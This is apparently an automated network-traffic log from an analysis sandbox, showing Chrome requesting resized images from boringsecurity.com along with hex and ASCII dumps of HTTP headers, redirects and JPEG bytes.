                                                                          2023-12-10 16:45:01 UTC217INData Raw: 64 33 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 71 75 69 74 5f 62 33 65 39 32 36 39 34 62 31 2e 70 6e 67 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 71 75 69 74 5f 62 33 65 39 32 36 39 34 62 31 2e 70 6e 67 26 77 3d 34 38 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: d3Redirecting to /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png&w=48&q=75
                                                                          2023-12-10 16:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          171192.168.2.54990575.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC420OUTGET /_ipx/w_640,q_75/%2Fimages%2Fbrushed.jpg?url=%2Fimages%2Fbrushed.jpg&w=640&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC410INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 33 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 61 2d 78 4f
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50933Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 31502Content-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: 3a-xO
                                                                          2023-12-10 16:45:01 UTC776INData Raw: ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 01 dc 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 19 00 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 00 04 06 ff c4 00 15 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f4 a0 4e a5 d6 48 55 64 a5 51 01 40 8a 53 48 94 33 61 c1 61 4b 63 32 91 ca 12 85 18 62 08 58 13
                                                                          Data Ascii: C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"NHUdQ@SH3aaKc2bX
                                                                          2023-12-10 16:45:01 UTC2372INData Raw: 25 1e 82 3d 1c 5a 31 03 0c 53 4f 1d 01 54 68 99 9a 79 40 ac a0 0e 09 93 82 c8 0b 37 3b 16 a7 3b 97 d2 25 32 38 ce ac 12 31 56 93 14 32 25 74 c1 54 50 15 20 0a d8 98 a2 08 95 52 49 64 22 94 42 60 a8 44 d0 b6 e7 c7 49 e5 c7 53 73 54 bd 23 73 50 b1 98 b0 ba 98 90 b0 20 28 84 d5 a6 64 20 50 d8 9e b9 39 8f 51 39 9a e0 57 52 36 52 3b 2d 0c 4e 19 94 8e c8 4a 19 12 9a 64 a0 4c 15 00 cb 94 28 54 c0 29 86 53 61 31 c4 c1 44 40 05 38 04 91 4b b8 b4 24 cc d4 11 8e 36 38 b2 3a 92 4b 48 55 69 81 1b 08 4a 99 5c 09 9c 8a c5 81 50 42 c8 4a e4 25 5a 4c 39 0e 28 72 23 50 91 35 24 b5 14 55 70 2e c0 c3 00 2e 40 cc a9 34 69 0c a8 a5 74 31 55 99 09 04 27 39 9d 5c 66 18 67 0e 6c d8 aa 84 0a 60 2a 38 24 b6 04 b5 49 11 60 49 ab 89 97 c0 60 c6 39 8c d9 86 65 73 3a 91 8a e2 8d 10 5c
                                                                          Data Ascii: %=Z1SOThy@7;;%281V2%tTP RId"B`DISsT#sP (d P9Q9WR6R;-NJdL(T)Sa1D@8K$68:KHUiJ\PBJ%ZL9(r#P5$Up..@4it1U'9\fgl`*8$I`I`9es:\
                                                                          2023-12-10 16:45:01 UTC538INData Raw: 98 83 9a 5a 47 4e 9d 18 e0 70 3c 48 44 0f 6f 5d 18 f5 69 2d 23 3a 31 9c 38 28 14 0a 0a c1 48 28 54 52 29 14 8a 44 74 5b 42 fa 42 f8 e6 f8 4a 26 60 99 c4 70 38 1c 16 1c 1c 22 a7 05 07 93 84 50 8a 0b 03 c9 e7 e3 83 83 83 c4 78 96 1e 27 91 c1 d3 ba 47 0e 1c 38 70 ac 14 82 90 54 5a 65 86 32 c5 8b 0c 7a e8 a4 e9 d3 a7 4f 47 b1 66 7b 3d 1e 8f 43 c8 79 0e 4e 91 62 d9 16 cc be 65 b2 2f 23 c8 e9 e8 e1 c3 84 a3 87 0e 1e 4e 1c 19 61 8c b1 62 c5 cb 96 2d 23 da 2a 56 0a c1 58 14 08 47 4e 9e 8e 9d 3d 1e 85 90 b2 3d 9e 87 3a e1 e4 f2 79 16 22 c4 f2 73 e5 96 c8 79 16 c8 72 3d 39 19 33 3b 7f 48 42 2a 54 a9 51 49 d3 a3 92 d2 31 ce 98 e4 e8 cb 16 92 f9 17 c8 b4 8c b0 c7 a6 32 47 f0 c6 5a 4f d3 23 f4 c8 fd 32 3f 49 2c 44 91 be 9e 85 96 96 d4 88 a8 84 2f 9e fc a1 7c 38 1c 16
                                                                          Data Ascii: ZGNp<HDo]i-#:18(H(TR)Dt[BBJ&`p8"Px'G8pTZe2zOGf{=CyNbe/#Nab-#*VXGN==:y"syr=93;HB*TQI12GZO#2?I,D/|8
                                                                          2023-12-10 16:45:01 UTC4744INData Raw: 70 e0 c6 3d 54 a1 42 85 24 52 2c 8f 47 7e b8 79 3c 0f 03 c9 e0 f0 78 38 53 13 f3 c4 a6 25 71 2b 80 b0 3c e9 8f 48 42 11 52 a5 64 78 9e 4f 24 a3 9a ac 14 28 50 5a 65 8b 41 68 2f 89 fa 41 78 3f 42 e5 a4 89 93 a3 92 c3 19 d3 a7 74 c7 f7 d3 a7 49 26 04 2d 31 96 1e a2 24 e8 a4 8b 1e 88 b0 f2 1c 8e 4e 8f 01 e2 3c 49 27 4b 68 52 29 16 da 1e d0 85 a4 54 ac 15 14 6d 8c e0 f1 2d 05 86 3d 74 52 21 13 13 a9 18 ce 0a 0a 95 28 56 44 74 82 32 2d 05 b1 2d 05 a0 b4 0b 23 d1 e8 63 19 62 df c1 c9 79 3f 43 f4 92 e3 fe 0c 63 83 87 3e 90 be 59 62 c5 8b 9f a4 9f a6 45 b2 93 d1 e8 f6 7a 3d 0b 31 64 54 a9 51 46 98 f4 8a 95 91 49 52 a5 45 22 93 a4 44 91 12 2d 29 3a 29 3b b8 fe 3c d2 81 40 b4 8a 94 3f 32 85 49 8c 4f 27 93 c9 58 29 05 31 2a 22 ba e9 dd 44 15 c4 ac 15 39 f1 d3 a7 4e
                                                                          Data Ascii: p=TB$R,G~y<x8S%q+<HBRdxO$(PZeAh/Ax?BtI&-1$N<I'KhR)Tm-=tR!(VDt2--#cby?Cc>YbEz=1dTQFIRE"D-):);<@?2IO'X)1*"D9N
                                                                          2023-12-10 16:45:01 UTC5930INData Raw: f0 8d 62 a8 aa de 56 f2 b7 95 bc ad e5 6a 10 84 23 97 6e dd eb 29 4b 0c 31 a4 a5 29 4f e2 85 ab 16 2c a2 d5 ab 68 84 21 0e dd bb 76 ed db b6 37 7c ee f9 dd 34 4d 13 4f 59 4a 57 2e e5 75 37 5f 4d d7 f2 bb 94 f2 9e 53 ca 79 77 e9 86 18 61 34 4e b8 4d 13 e2 9a 25 3a 4b 2c b2 fa 65 9f 49 4a 52 bd 7a f5 dc 2f e1 fb 2b b3 f6 55 7d 57 55 35 4f 96 cf ad 99 5e ba a9 4f a7 6e f5 85 ab 79 5b ca de 51 56 59 65 d3 a7 4e 9d 3a f5 c2 28 b7 c5 14 45 18 4a 52 9a a7 c9 f4 cf a7 49 e1 34 d9 34 4d 13 45 d4 5c bd 7d 57 d7 65 de 4b fc 97 f9 2e f2 4f 92 7c 91 a6 18 61 8d d1 4d d1 e2 c7 a4 ae 5d 55 d5 5d e4 ba a9 aa 52 94 a7 4e d0 84 21 08 a2 28 8a 21 08 7d 3e 99 4d 52 9f 5c 3e 5f 2e 91 c2 ce 16 70 b2 8b 16 a1 1a 65 94 a5 d3 ad 25 35 4d 53 5d d3 e5 ba 6b ba 79 4f 29 4d 35 ed 08
                                                                          Data Ascii: bVj#n)K1)O,h!v7|4MOYJW.u7_MSywa4NM%:K,eIJRz/+U}WU5O^Ony[QVYeN:(EJRI44ME\}WeK.O|aM]U]RN!(!}>MR\>_.pe%5MS]kyO)M5
                                                                          2023-12-10 16:45:01 UTC7116INData Raw: cc d6 35 0c f1 dd 8a e6 66 e3 5c 31 f6 c3 7e 88 bf 7f d3 91 8f ee f4 3f 60 33 32 ba 0c 31 68 76 1b e1 b0 93 f2 4c c1 1f e3 b7 a1 49 31 25 88 09 1e e2 a1 78 a9 86 b1 09 58 1c f6 38 fc 2a 77 33 06 be 83 e0 c7 93 72 2a 4f c8 d2 a2 1d 80 c8 90 93 a1 ec a1 8d 06 b5 ce 06 2f 72 85 f0 8a b5 c4 ac 77 33 57 17 d4 2a f0 91 63 13 18 c2 ac b9 3a ae 28 e2 ce 3b 1a 24 48 e7 f0 34 71 e4 f2 b0 f4 76 1d 4b a1 ac 6b 8c 3c 0c 7f 60 e9 6e 26 ab 8d 16 0c ed 52 b8 d1 ff 00 61 b0 19 1a 1f 24 09 08 9a b7 3b 7d 8d e1 0c cd d9 5d ee c5 c5 b1 b5 14 54 42 34 97 c0 e3 28 51 45 d1 3c 91 0e 81 a6 10 72 29 97 e0 97 c7 e8 95 17 1a 14 78 b4 23 1f 41 70 a9 f8 91 a2 b0 c9 d8 49 fa 55 5e 3c 1c 4f d0 a4 fd 7c f0 45 7e 78 39 76 22 8e c6 85 c9 fa 8a 3e c9 4f 0f 3c 0f be 17 e4 80 93 a8 9e aa c2
                                                                          Data Ascii: 5f\1~?`321hvLI1%xX8*w3r*O/rw3W*c:(;$H4qvKk<`n&Ra$;}]TB4(QE<r)x#ApIU^<O|E~x9v">O<
                                                                          2023-12-10 16:45:01 UTC8302INData Raw: 79 94 fd 0c e8 9e 18 d5 81 e6 81 d5 b6 ee 81 b2 1d 18 99 80 f9 de 56 61 46 8e f2 fb c0 ec 24 b3 75 8b 98 2f 47 e9 07 7b 5d a5 0e 6b b0 ed 10 c4 3c bb 40 5c 8f 2e d0 45 b7 f1 da 1d e0 9a e2 07 f0 7b 45 c7 17 bf d2 30 b5 f3 fd 47 71 af 46 37 78 2f 5b 77 8c d8 2f ce b0 17 47 ba ef 10 c9 a9 fb 8a b0 50 2a bb ba bf e4 78 4b b0 d7 f2 62 e3 e5 af 51 2f 95 0e 05 ee cd c8 d4 f2 95 cf 1b 47 dc 43 8f c2 0c f7 b7 42 58 28 3b d4 b1 e8 42 9f 5e c8 f1 16 bf 78 41 62 a5 fd e1 05 63 57 2f f3 02 33 3a 51 f9 a8 bc df 75 44 2e 17 88 d4 de 0f 30 de 27 1c 3c 03 dc 71 3f 0f da 00 e6 3f 7a c0 0e 0b 7d 52 a8 68 75 65 a7 e8 f8 81 d1 57 7d a9 43 e5 b6 d0 e3 7c 8d a2 5f 63 85 f8 7c 1e e6 23 f8 ee 4b f1 6a 77 60 d3 1f cc 18 16 1d 5d a0 d1 91 d6 64 a8 80 33 88 4e 3c 3f db 26 06 1f 12
                                                                          Data Ascii: yVaF$u/G{]k<@\.E{E0GqF7x/[w/GP*xKbQ/GCBX(;B^xAbcW/3:QuD.0'<q??z}RhueW}C|_c|#Kjw`]d3N<?&
                                                                          2023-12-10 16:45:01 UTC1724INData Raw: 59 4a f6 11 79 37 60 8b 4c b7 b4 77 d0 bc ab 69 b2 0a e1 5e e2 21 c5 e3 da 24 78 ba ad a5 98 59 6f 3c e5 bb aa ef 1e 5f 1f 78 86 b8 dd 03 fe 31 0e 3a 52 8c db 51 39 a9 d2 dd a2 4e 17 41 7d 4c 4c 4f 5f a2 5d c3 c8 da 07 20 9d 18 93 0d 3b 40 c3 36 ba e2 2f 62 5b 95 5d 98 85 80 0e aa 58 5a 57 aa da 66 4f 3f a8 81 c1 4e e9 ea 58 58 f6 5b 69 6b 16 ef 16 79 a7 54 44 a7 07 5c 48 d1 db 51 ba be 64 58 b0 bb 0c 06 ef c0 08 1f b3 82 c0 1e 78 e0 e3 83 da 68 57 e7 6d 0b 46 96 1f 52 87 85 d4 ed 01 0f e4 da 15 55 e7 5f a4 31 4b 0e 8e d2 e7 a7 f9 28 62 b5 5d a2 78 1f 6c a0 a9 56 76 fa c1 e5 7f bd 22 d6 27 5a 6d 0e 07 cc 97 6c e7 66 39 2d f8 99 72 1d c9 8c ba b4 8b d0 fe 73 96 9e a4 41 9f ca 88 84 3e 7e a3 b6 ff 00 91 27 9d db 69 4a dd 35 36 80 8e 0e 9f 53 86 55 d6 bd 45
                                                                          Data Ascii: YJy7`Lwi^!$xYo<_x1:RQ9NA}LLO_] ;@6/b[]XZWfO?NXX[ikyTD\HQdXxhWmFRU_1K(b]xlVv"'Zmlf9-rsA>~'iJ56SUE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          172192.168.2.54990475.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC717OUTGET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC562INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 65 63 62 37 30 37 32 34 34 33 30 39 31 30 38 35 61 63 34 37 64 30 32
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:45:01 GMTLocation: /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d02
                                                                          2023-12-10 16:45:01 UTC274INData Raw: 31 30 62 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 65 63 62 37 30 37 32 34 34 33 30 39 31 30 38 35 61 63 34 37 64 30 32 30 34 64 64 33 62 33 39 64 5f 64 38 36 37 64 31 65 38 32 63 2e 70 6e 67 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 65 63 62 37 30 37 32 34 34 33 30 39 31 30 38 35 61 63 34 37 64 30 32 30 34 64 64 33 62 33 39 64 5f 64 38 36 37 64 31 65 38
                                                                          Data Ascii: 10bRedirecting to /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e8
                                                                          2023-12-10 16:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          173192.168.2.54990675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC777OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC416INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 34 2d 4c 33 55 72 54 53 30 56 42 6a 55 55 46 51 34 30 2f 4d 69 4f 65 79 58 36
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: 34-L3UrTS0VBjUUFQ40/MiOeyX6
                                                                          2023-12-10 16:45:01 UTC1202INData Raw: 34 61 62 0d 0a ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 00 30 00 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 02 03 04 01 07 ff c4 00 19 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 00 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 63 bc 44 50 fd 9e 55 c2 7a cc 87 ee 90 18 cd 63 6a a5 db 1b 18 fa
                                                                          Data Ascii: 4abC $.' ",#(7),01444'9=82<.342C2!!2222222222222222222222222222222222222222222222222200"cDPUzcj
                                                                          2023-12-10 16:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          174192.168.2.54990975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC584OUTGET /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC407INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 31 36 33 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 37 2d 79 6a 7a 4b 46
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 216367Content-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: 37-yjzKF
                                                                          2023-12-10 16:45:01 UTC779INData Raw: ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 03 e8 03 e8 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 00 01 02 05 06 07 ff c4 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f1 8d 80 e7 38 72 5c 05 5c b7 9d 5c 81 25 60 64 ce 6d dd 57 53 a0 ef 8d d4 6f
                                                                          Data Ascii: C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"8r\\\%`dmWSo
                                                                          2023-12-10 16:45:01 UTC2372INData Raw: f1 cc 26 bb 7c d7 e6 77 cb 6b 98 1d 36 b3 a4 a2 63 d3 6c f1 ed e6 b9 17 9d ed 85 4b a7 33 45 ee e7 b7 19 1f 4e 08 be 6f 46 ce 8a 06 d6 47 34 0c 86 ba 8a a3 dc aa 9f 63 3c da cb 2f 5b 3c e3 28 ed 72 f0 61 1d ae 62 23 ec f0 43 ab d6 63 78 ab dc 90 79 99 5c 47 d0 98 01 9c 6e 0f a5 e7 ba 7c e2 8e fa 3d 41 71 e5 5d 79 95 2e 00 f5 1a 5d 9a ef 32 97 26 bd c1 da d8 36 bc 43 be 83 69 f0 bd 20 33 d7 48 e6 40 27 44 20 00 63 b1 cb 58 3b cf eb b0 ab 96 4e c8 e3 0f 37 0c be d3 a8 28 eb 7e df c5 fa 5a bb e5 74 72 2b ba 41 1d 04 b9 c3 50 61 0a 23 61 9b 35 19 86 4b 5d a1 90 48 e1 87 a7 ac 4e 5b 77 8d 37 d5 08 e3 ce 40 d0 b7 9d 65 3d 74 79 bd 92 94 4b af cb 0c 8d 85 c9 2d 8a 83 5d 1e 73 a3 4e 48 0c 30 a3 60 98 44 53 2e ba 3d 5f 38 5b 36 b5 9c ac ad 51 93 79 85 1b 6b 52 9e
